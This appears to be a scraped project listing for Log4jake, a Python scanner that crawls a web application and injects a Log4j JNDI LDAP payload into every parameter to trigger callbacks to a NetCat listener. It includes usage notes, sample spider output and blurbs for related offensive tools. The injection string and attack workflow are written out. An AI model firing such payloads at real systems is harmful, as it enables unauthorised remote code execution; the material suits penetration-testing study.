Log4jake

Log4jake works by spidering a web application for GET/POST requests. It will then automatically execute the GET/POST requests, filling any discovered parameters with the ${jndi:ldap://:389} Log4j payload. Note that this tool is designed to work simultaneously with a NetCat listener.

If you want to test behind authentication, use the commented '#req.add_header('Authorization', "token_goes_here")' line to add the proper token. If you are experiencing SSL errors, use the commented '#context = ssl._create_unverified_context()' line in addition to 'resp = urllib.request.urlopen(req, context=context)'

Syntax:

  └─$ python3 log4jake.py https://10.10.3.50
Remember to start NetCat Listener on port 389!!!
Enter IP address of your Listener: 10.10.3.4  

Starting Web Spider
-------------------

SPIDERING -> https://10.10.3.50/
SPIDERING -> https://10.10.3.50/signup
POST /signup
SPIDERING -> https://10.10.3.50/login
POST /login_exec
SPIDERING -> https://10.10.3.50/clients
SPIDERING -> https://10.10.3.50/admin/website
SPIDERING -> https://10.10.3.50/cdn-cgi/l/email-protection#9ef4f1f0defdf8ffedf7eafbedb0fdf1f3
SPIDERING -> https://10.10.3.50/forgotpassword
POST /mailer5

Log4jake works by spidering a web application for GET/POST requests

Related tags

Overview

Log4jake

Owner

automatically crawl every URL and find cross site scripting (XSS)

A gui application used for network reconnaissance while pentesting

A Python & JavaScript Obfuscator made in Python 3.

Omega - From Wordpress admin to pty

Auto Tor Ip Changer

Using python 3 and Flask an MVC system where the AES 128 CBC and Trivium algorithms

Facebook account cloning/hacking advanced tool + dictionary attack added | Facebook automation tool

Tensorflow 1.13.X implementation for our NN paper: Wei Xia, Sen Wang, Ming Yang, Quanxue Gao, Jungong Han, Xinbo Gao: Multi-view graph embedding clustering network: Joint self-supervision and block diagonal representation. Neural Networks 145: 1-9 (2022)

A Proof-of-Concept Layer 2 Denial of Service Attack that disrupts low level operations of Programmable Logic Controllers within industrial environments. Utilizing multithreaded processing, Automator-Terminator delivers a powerful wave of spoofed ethernet packets to a null MAC address.

This script allows you to make a onion host instantly.

How to exploit a double free vulnerability in 2021. 'Use-After-Free for Dummies'

CVE-2021-43798Exp多线程批量验证脚本

A black hole for Internet advertisements

Simple tool to create passwords.

Uncover the full name of a target on Linkedin.

Official implementation of the paper "Backdoor Attacks on Self-Supervised Learning".

A kAFL based hypervisor fuzzer which fully supports nested VMs

Password List Creator Simple !

adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228